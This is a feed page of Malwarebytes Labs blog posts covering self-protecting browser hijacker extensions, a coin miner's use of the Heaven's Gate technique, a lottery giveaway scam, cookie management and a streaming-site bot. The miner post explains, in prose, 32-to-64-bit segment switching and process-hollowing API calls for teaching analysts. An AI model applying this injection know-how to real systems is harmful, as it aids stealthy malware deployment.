What you don’t see won’t hurt you, must have been the reasoning of the threat actors who created the latest batch of extensions that make these browser hijackers even more difficult to remove. The extensions redirect users away from pages where they can disable or delete them in order to drive clicks up on YouTube videos or hijack searchers.

The extensions, which have been found in both Chrome and Firefox browsers, block users from removing them by either by closing out pages with extensions/add-ons info, or sending users to a different page, such as an apps overview page, where extensions aren’t listed.

In Firefox, this problem is relatively easy to circumvent, but for Chrome it takes a lot of digging—so much so that we suggest the fastest way to resolve the problem is to report it to Chrome or your favorite security solution so they (we) can take care of it. (Malwarebytes Premium and Business users are already protected from these threats by our website protection module.)

However, if you’re not a Premium customer, there are still some, admittedly involved, ways to get around these murky and persistent browser hijackers by recognizing, finding, and removing the extensions. Here’s what you can do.

For Chrome

First, we’re going to look at the Chrome extension called Tiempo en colombia en vivo, which is pushed by the method we previously described as a forced Chrome extension. The extension is detected by Malwarebytes as Rogue.ForcedExtension.

You can find the removal guide for Tiempo en colombia en vivo on our forums.

The extension keep users out of Chrome’s extensions list by redirecting chrome://extensions/ to chrome://apps/?r=extensions, where the offending extension is not listed, as only the installed apps will be shown.

Blocking JavaScript in Chrome doesn’t help in this case, as that setting only applies to sites and not to this (internal) page.


The clean method to disable extensions from redirecting your Chrome tabs is to start Chrome with disabled extensions. You can do this by adding the switch “–disable-extensions” to the command to run Chrome.

But doing this will not offer you the option to remove any extensions, as Chrome will behave as if it has no extensions whatsoever. So this offers us no way to remove the extension from the list as you normally would.

Renaming the file 1499654451774.js in the extensions folder does help, however, and after a restart of Chrome, we can see the extension in the list of extensions. It shows up as corrupted because we renamed their JavaScript to something else, so it can’t find what it’s looking for.

Tip: To escape from a Chrome site that is trying to make you stay there, you can use Ctrl+T to open a new tab. The new tab will have focus, so you can then close the offending tab by clicking the “x” that lights up in red when you hover over the tab.

For Firefox

We also found a Firefox extension that displays similar behavior to the Chrome extension. This one was pushed by ad-rotators as a manual update for Firefox.

Malwarebytes detects this extension as PUP.Optional.FFHelperProtection. A full removal guide for FF Helper Protection can be found on our forums.

This extension blocks about:addons in background.js by looking for that string in the URL and closing the tab if the string is found.

This means that you can’t remove the extension manually.

Firefox, however, can be run in safe mode by holding down the Shift key while starting Firefox. Then confirm that you want to “Start in Safe Mode” in this prompt.

Firefox’ safe mode is most helpful, as you can see all the installed extensions while they are not active. Doing so allows you to manually remove the extension (and any others you might not want) in the same way you normally would. Click the “Remove” button in the extensions description field, and you’re done.

If you are kept on a Firefox tab by JavaScript(s) that keep popping up with prompts, and you are unable to close the window in the usual way, you can terminate Firefox by using Taskmanager. When you restart Firefox, it will not be able to restore the session for that tab.

How to avoid

While the extensions have been around for a few weeks, both are still in use in one form or another. In fact, the Tiempo en colombia en vivo extension was still available in the Chrome Web Store at the time of writing. Unfortunately, since both the Chrome and Firefox extensions mostly add themselves through forced installs, it’s not always possible to avoid getting them. The best we can offer is to stay vigilant as you surf and use an adblocker (that could help with blocking the Firefox extension). Though we’d like add the obvious: Avoid actually downloading these extensions in web stores as well. In fact, it’s a good idea to read the fine print carefully for any browser extension you download.



Chrome extension: gbhodkgjhojjjggokjjlbccecdhkjjgl

Firefox extensions: {eb3ebb14-6ced-4f60-9800-85c3de3680a4}.xpi, {b91fcda4-88b0-4a10-9015-9365e5340563}.xpi

Stay safe out there.

The post New Chrome and Firefox extensions block their removal to hijack browsers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A coin miner with a “Heaven’s Gate”

Malwarebytes - Wed, 01/17/2018 - 16:00

You might call the last two years the years of ransomware. Ransomware was, without a doubt, the most popular type of malware. But at the end of last year, we started observing that ransomware was losing its popularity to coin miners. It is very much possible that this trend will grow as 2018 progresses.

From the point of view of the victim, this is a huge relief, because miners are not as much of a threat as ransomware. They slow down the system, yes, but once you get rid of them you can continue using your computer as before. No data is stolen, or lost as in the case with a ransomware infection.

From the point of view of a malware researcher, miners are so far disappointing. They don’t give enough interesting material for a deeper analysis, mostly because they are based on well-known open source components with little or no obfuscation.

However, from time to time, we find coin miners incorporating interesting tricks. In one recent sample, we observed a technique called “Heaven’s Gate” that allows the malware to make injections to 64-bit processes from 32-bit loaders. This trick is not new—its introduction is dated to 2009—but it’s curious to see it implemented in this new sample captured in wild.

Those who are beginners in malware analysis can read on for a guide about what Heaven’s Gate is and how to approach analyzing it.

Analyzed samples

This sample was found in the continuation of the Ngay campaign (more about it here). A background check on similar samples lead me to the article of @_qaz_qaz, who described an earlier campaign with a similar sample. However, his analysis skipped details on the Heaven’s Gate technique.

Behavioral analysis

To observe the mentioned injection, we must run the sample on a 64-bit system. We can see that it runs an instance of notepad, with parameters typical for mining cryptocurrency:

Looking at the in-memory strings in ProcessExplorer, we can clearly see that it is not a real notepad running, but the xmrig Monero miner:

So, at this moment we’re confident that the notepad’s image has been replaced in memory, most probably by the RunPE (Process Hollowing) technique.

The main dropper is 32-bit, but it injects a payload into a 64-bit notepad:

The fun part is that this type of injection is not supported by the official Windows API. We can read/write the memory of 32-bit processes from a 64-bit application (using Wow64 API), but not the other way around.

There are, however, some unofficial solutions to this, such as the technique called “Heaven’s Gate.”

Heaven’s Gate overview

The Heaven’s Gate technique was first described in 2009, by a hacker nicknamed Roy G. Biv. Later, many adaptations were created, such as a library Wow64ext  or, basing in it, W64oWoW64. In the blog post from 2015, Alex Ionescu described mitigations against this technique.

But let’s have a look at how it works.

Running 32-bit processes on 64-bit Windows

Every 32-bit process that runs on a 64-bit version of Windows runs in a special subsystem called WoW64 that emulates the 32-bit environment. We can explain it as a 32-bit sandbox that is created inside a 64-bit process. So, first the 64-bit environment for the process is created. Then, inside it, the 32-bit environment is created. The application is executed in this 32-bit environment and it has no access to the 64-bit part.

If we scan the 32-bit process from outside, via the 64-bit scanner, we can see that it has inside both 32 and 64 DLLs. Most importantly, it has two versions of NTDLL: 32-bit (loaded from a directory SysWow64) and 64-bit (loaded from a directory System32):

However, the 32-bit process itself can’t see the 64-bit part and is limited to using the 32-bit DLLs. To make an injection to a 64-bit process, we’d need to use the 64-bit versions of appropriate functions.

Code segments

In order to access the forbidden part of the environment, we need to understand how the isolation is made. It turns out that it’s quite simple. The 32- and 64-bit code execution is accessible via a different address of the code segment: 32-bit is 0x23 and 64-bit is 0x33.

If we call an address in a typical way, the mode that is used to interpret it is the one set by default. However, we can explicitly request to change it using assembler instructions.

Inside the miner: the Heaven’s Gate implementation

I will not do a full analysis of this miner because it has already been described here. Let’s jump directly to the place where the fun begins. The malware checks its environment, and if it finds that it’s running on a 64-bit system, it takes a different path to make an injection into a 64-bit process:

After some anti-analysis checks, it creates a new, suspended 64-bit process (in this case, it is a notepad):

This is the target into which the malicious payload is going to be injected.

As we discussed before, in order to inject the payload into a 64-bit process, we need to use the appropriate 64-bit functions.

First, the loader takes a handle to a 64-bit NTDLL:

What happens inside this function get_ntdll requires some deeper explanation. As a reference, we can also have a look at the analogical code in the ReWolf’s library.

To get access to the 64-bit part of the process environment, we need to manipulate the segments selectors. Let’s see how our malware enters the 64-bit mode:

This code seems to be directly copied from the open source library:

The segment selector 0x33 is pushed on the stack. Then, the malware calls the next line: (By this way, the next line’s address is also pushed on the stack.)

An address that was pushed is fixed by adding 5 bytes and set after the retf :

At the end, the instruction RETF is called. RETF is a “far return,” and in contrast to the casual RET, it allows to specify not only the address where the execution should return, but also the segment. It takes as arguments two DWORDs from the stack. So, when the RETF is hit, the actual return address is:


Thanks to the changed segment, the code that starts at the specified address is interpreted as 64-bit. So, the code that is visible under the debugger as 32-bit…

…is, in reality, 64-bit.

For the fast switching of those views, I used a feature of PE-bear:

And this is how this piece of code looks, if it is interpreted as 64-bit:

So, the code that is executed here is responsible for moving the content of the R12 register into a variable on the stack, and then switching back to the 32-bit mode. This is done for the purpose of getting 64bit Thread Environment Block (TEB), from which next we fetch the 64-bit Process Environment Block (PEB) —check the analogical code.

The 64-bit PEB is used as a starting point to search the 64-bit version of NTDLL. This part is implemented in a casual way (a “vanilla” implementation of this technique can be found here) using a pointer to the loaded libraries that is one of the fields in the PEB structure. So, from PEB we get a field called Ldr:

Ldr is a structure of the type _PEB_LDR_DATA. It contains an entry called InMemoryOrderModuleList:

This list contains all the loaded DLLs that are present in the memory of the examined process. We browse through this list until we find the DLL of our interest that, in this case, is NTDLL. This is exactly what the mentioned function get_ntdll does. In order to find the appropriate name, it calls the following function—denoted as is_ntdll_lib—that checks the name of the library character-by-character and compares it with ntdll.dll. It is an equivalent of this code.

If the name matches, the address to the library is returned in a pair of registers:

Once we found NTDLL, we just needed to fetch addresses of the appropriate functions. We did this by browsing the exports table of the DLL:

The following functions are being fetched:

  • NttUnmapViewOfSection
  • NtGetContextThread
  • NtAllocateVirtualMemory
  • NtReadVirtualMemory
  • NtWriteVirtualMemory
  • NtSetContextThread

As we know, those functions are typical for RunPE technique. First, the NtUnmapViewOfSection is used to unmap the original PE file. Then, memory in the remote process is allocated, and the new PE is written. At the end, the context of the process is changed to start the execution from the injected module.

The addresses of the functions are saved and later called (similarly to this code) to manipulate the remote process.


So far, authors of coin miners don’t show a lot of creativity. They achieve their goals by heavily relying on open-source components. The described case also shows this tendency – they made use of a ready made implementation.

The Heaven’s Gate technique has been around for several years. Some malware use it for the purpose of being stealthy. But in case of this coin miner, authors probably aimed rather to maximize performance by using a payload version that best fit the target architecture.

The post A coin miner with a “Heaven’s Gate” appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Be wary of Mega Millions winner “giveaway” on social media

Malwarebytes - Tue, 01/16/2018 - 18:12

I don’t do lotteries, but if I did, I’d probably never, ever win in a million years. That’s not a problem faced by 20-year-old Shane Missler, winner of the fourth-largest haul in Mega Millions’ 21 years of handing out large bundles of cash.

He’s on record as saying he wants to “do some good” for humanity, but I suspect he may have to do some good in the identification verification sweepstakes first.

An account has popped up on Twitter claiming to be him, and claiming he’ll be giving away large amounts of money for retweets. I mean, it’s not exactly donating a million to medical science, but it’s definitely going to help random recipients.

Only problem is, the account seems a little too good to be true. In fact, it’s just one of many currently being retweeted into the stratosphere:

Click to enlarge

Shall we take a look?

Click to enlarge

First off: the bio.

Lottery winner of $451 Million. Giving back $5,000 to the first 50k followers that retweet **SIGN UP AND PURCHASE IN LINK BELOW FOR AN INSTANT $2,000**

Well, that’s interesting. You have to “sign up” AND “purchase” via a link to receive $2,000?

The link in question is an Amazon referral link, and for some reason our very rich lottery winner wants you to purchase an Amazon fire stick. If you won $451m, would you be bothering with Amazon referral sales, which would generate tiny amounts of money for the Amazon associate before handing over $2,000? What’s the point?

Click to enlarge

Even better is the claim that $5,000 will be winging its way to 50k followers who retweet the original post. From the BBC article:

He opted to receive a one-time payment of $282m, instead of the full amount over a longer period of time.

Uh oh.

5,000 x 50,000 is $250m, except according to this article after you account for taxes he’ll likely be left with around $211m.

So there’s that, plus the apparently ability to keep giving people $2,000 from a bottomless well of cash for every Amazon stick purchased…somehow.

I don’t know about you, but I think I’ll pass on retweeting this and/or going on an Amazon spree, because there’s no way this guy is planning on re-enacting Catch Me If You Can immediately after scoring the cash windfall of his dreams. It just doesn’t make any sense.

A number of similar accounts are also doing the rounds, all of which are claiming much the same things (along with the claim that his account is being “verified soon”).

I can tell you now, there’s no way anyone can confidently predict their Twitter account will be verified, much less when. After the application is sent off to the verification team, you could be verified the next day, week, month, or never. It’s simply not something you can claim is going to happen, because no timescales are given to applicants by Twitter. Also of note: the above account retweeted the below tweet to make it look as though money was indeed being fired off to people:

Click to enlarge

Some problems with this: neither account is verified. All of these people could be real or playing along or the same individual. Worse, all of the accounts claim the $5,000 will be sent to the “first 50k followers that retweet my pinned tweet.”

Great, except look at the retweet numbers at time of writing:

…and the follower count?

Why has someone been sent money already? Looking at all of the evidence on offer, we feel it’s better to take the stance that without verification this is very, very likely to be a scam. Whatever the winner has planned for his money—and it seems most of what he’s said involves treating his family—there’s a good chance it doesn’t involve giving away all (or, hilariously, more than all) of his recently received winnings. Some of the other accounts floating around don’t even spell his name correctly.

Sorry, Twitter. This isn’t the golden ticket you’re looking for.

The post Be wary of Mega Millions winner “giveaway” on social media appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cookies: Should I worry about them?

Malwarebytes - Mon, 01/15/2018 - 18:16

Starting off the new year, many of us are worried about cookies—how many we ate over the holidays and how we’re going to avoid them in the break room, for example. With so much cybercrime and data theft swirling around like daily bomb cyclones, there’s more than a few folks worried about the kinds of cookies they encounter on the Internet.

But should they be?

Cookies are typically text files that can provide information about your browsing behavior to websites that you visit. On the one hand, cookies are useful for making your Internet experience more efficient. It’s how you automatically get logged in on sites you’ve already visited, even if you closed the browser tab, for example. But on the other hand, cookies are part of the advertising ecosystem that knows which advertisements are most likely to draw your attention—and they serve them up to you wherever you visit.

Why doesn’t Malwarebytes detect cookies?

Cookies in themselves are harmless. They are just data stored by a website in your browser, and they are not malware. It is what sites do with them that determines whether we like them or not. Some cookies are essential to use a site properly, and others might be considered a privacy risk. Since the possible preferences are various and personal, we believe in leaving the choice up to our customers. Of course, we can and do block sites that we know to plant overly intrusive cookies on a user’s machine. But otherwise, we leave it up to you.

How do I delete and control cookies?

At some point, you may want to remove the cookies from your browser. Below, you will see how to do that for a couple popular browsers. But before you get rid of all of them, let me warn you that you may regret doing so. Your favorite sites will forget who you are, and you will have to log in where you normally were automatically accepted.



Unfortunately, Edge (like Internet Explorer) does not have a built-in cookie management tool for specific cookies. It does have a delete all or nothing option, which you can find under Settings. Under Clear Browsing Data click Choose  > Cookies and saved website data. The control is also not very granular. You can find it under Settings > Advanced settings > View advanced settings. You will find three options: block, don’t block, or block only third-party cookies.

Internet Explorer

To clear cookies in Internet Explorer, select Tools > Internet options > General tab. Under Browsing history, hit Delete and put a checkmark in the Cookies box. Think once more, because this is an all or nothing method, before you hit Delete. For a more detailed description, check out Microsoft’s support article on How to delete cookie files in Internet Explorer.


Go to Menu > Settings > Show advanced settings. Under Privacy, click Content settings > Cookies. Click “All cookies and site data” to get an overview. Here you do have a choice on what to delete. You can delete individual cookies separately or all of them in one sweep. For a more detailed description, see Google’s support article: Manage your cookies and site data.


Click on the Firefox button > Options > Privacy > Show Cookies. Here you will see options to Delete all cookies or search for specific ones you want to delete. For a more detailed description, take a look at Firefox’s article: Delete cookies to remove the information websites have stored on your computer.


Click the Opera button > Settings > Delete Private Data > Detailed options > Manage cookies. Here you will see an overview of the stored cookies and an option to delete them separately. For more information, see Opera’s help article: Manage Cookies.

In the links I have provided for Chrome, Firefox, and Opera, you will also find information on how to control which cookies get stored on your computer. Internet Explorer has the controls on the Privacy tab under Tools > Internet options.


Malwarebytes for Mac does not detect or remove cookies either. Like we said before, cookies are just data stored by a website, and not malware. At worst, they can pose a threat to your privacy, in the case of tracking cookies. Further, many cookies are not only legitimate, but also required for normal operation of some websites.

If you feel it necessary to delete cookies from your computer, some of them may be difficult to get rid of. You can use the following techniques to delete these cookies, but you should be aware that they will come right back as soon as you visit a site that sets those cookies.


Safari offers the option to clear all your cookies along with your browsing history. To use this option choose History > Clear History. Click the pop-up menu, and then choose how far back you want your browsing history cleared. Or you can choose to delete only cookies and website data by clicking Preferences > Privacy > Manage Website Data. Select one or more websites, then click Remove or Remove All. For more information, see Safari’s support articles: Manage cookies and website data and Safari help.

Under Privacy, you can also find the settings to control which cookies will be allowed moving forward by choosing “Change which cookies and website data are accepted.”

Adobe Flash Player

When you visit some sites with Adobe Flash Player installed and activated, the software also stores cookie data on your system. The easiest way to control these is to visit the Flash Player Help site and use the Website Storage Settings panel displayed there to delete those that you no longer want. Read the information below the panel to make sure you understand what your options are and how to use them.


Browser plug-in Silverlight can also store cross-browser information in the application cache. To delete the Silverlight Cache, follow this procedure:

  • Close all Microsoft browser windows (Internet Explorer and Edge).
  • Click Start > All Programs > Microsoft Silverlight.
  • Choose the Application Storage tab.
  • Click Delete all.
  • Click “Yes” in the “Delete application storage for all Web sites?” dialog.
  • Click OK.

Evercookies are not just text files. They are Javascript routines that recreate cookies even after they have been removed. Evercookies often rely on the two major streaming video browser plug-ins: Microsoft Silverlight and Adobe Flash. These plug-ins allow their own caching and storage, which can be used across sessions and even across browsers. But they can be hidden in other caches as well. By storing the same data in several locations that a client can access, the data can be recovered and then reset and reused if any of it is ever lost (for example, by clearing cookies).

To actually get rid of evercookies, you would have to delete all the related cookies and clear all the caches of all your browsers and video browser plug-ins, using the information posted above.


These are technically not cookies because they are not stored in browsers or browser plug-ins, but I wanted to mention them here anyway because their name might lead you to think otherwise. Supercookies are unique identifiers that are inserted into the HTTP header by a service provider. Service providers are legally bound to offer you an opt-out option, so it could be prudent to check if your service provider uses supercookies and how to opt out if they do.

The post Cookies: Should I worry about them? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (January 8 – January 14)

Malwarebytes - Mon, 01/15/2018 - 17:00

It’s very early in the year, yet everyone has already had a complete meltdown (pun intended) over a number of serious vulnerabilities found in legacy and modern microprocessors. Last week, rightly so, vendors released patches for hardware and OSes to help mitigate these threats. However, problems in patching persisted.

As if this wasn’t challenging enough, some online criminals jumped on the bandwagon to take advantage of the hullabaloo to push out the Smoke Loader malware to inconspicuous user systems.

On our blog, we also touched on WPA3, misleading marketing tactics, more 419 scams, and the indictment of alleged Fruitfly creator—a win for the security community.

Lastly, in the realm of cryptocurrency, we saw an increase in malware payloads from the RIG exploit kit.

Other news

Stay safe, everyone!

The post A week in security (January 8 – January 14) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Stripchat bot spells block

Malwarebytes - Fri, 01/12/2018 - 23:26

Here at Malwarebytes, we spent a lot of time and effort scouring the Internet looking for malicious websites that we can protect our users from. Sometimes, these websites are pushing malware or some kind of scam. Other times it comes down to bad advertising practices that are used to fool the user into clicking on something.

We used to see a lot of this kind of trick with fake download buttons that redirected users to sites for installer downloads or to surveys. More recently, we found a site using a different type of deception, and it’s shot up to our second-most common detection over the last month. The site is called is an online streaming video service operated by Technius LTD and offered on a number of popular websites. The streaming service targets adult audiences for the purposes of online sexual encounters. The service boasts many active subscribers and a number of channels available for use.


Stripchat has a number of valid channels, feeds, and websites, but one particular subdomain has caught the attention of Malwarebytes for implementing various deceptive tactics and misleading techniques.  The website,, is a domain which is used for advertising purposes. Once opened in a web browser, the website purports to engage the user via a “live” chat window and the ability to chat with a model. This, however, is not the case.

The reported live video feed is nothing more than a video retrieved from the Internet and subsequently looped, or in some cases terminated with a message indicating the model is in a private chat. These messages are deceptive, as the feeds are not live as claimed to be and the responses are pre-programmed, as can be seen from the Javascript code and subsequent chat session.

Malwarebytes blocks the sub-domain for the use of these misleading marketing tactics.

However, if you’d like to continue visiting this sub-domain, you can add an exception. Scroll down to the “How to add an exception” heading of this post on why we block CoinHive to learn how.

The post Stripchat bot spells block appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds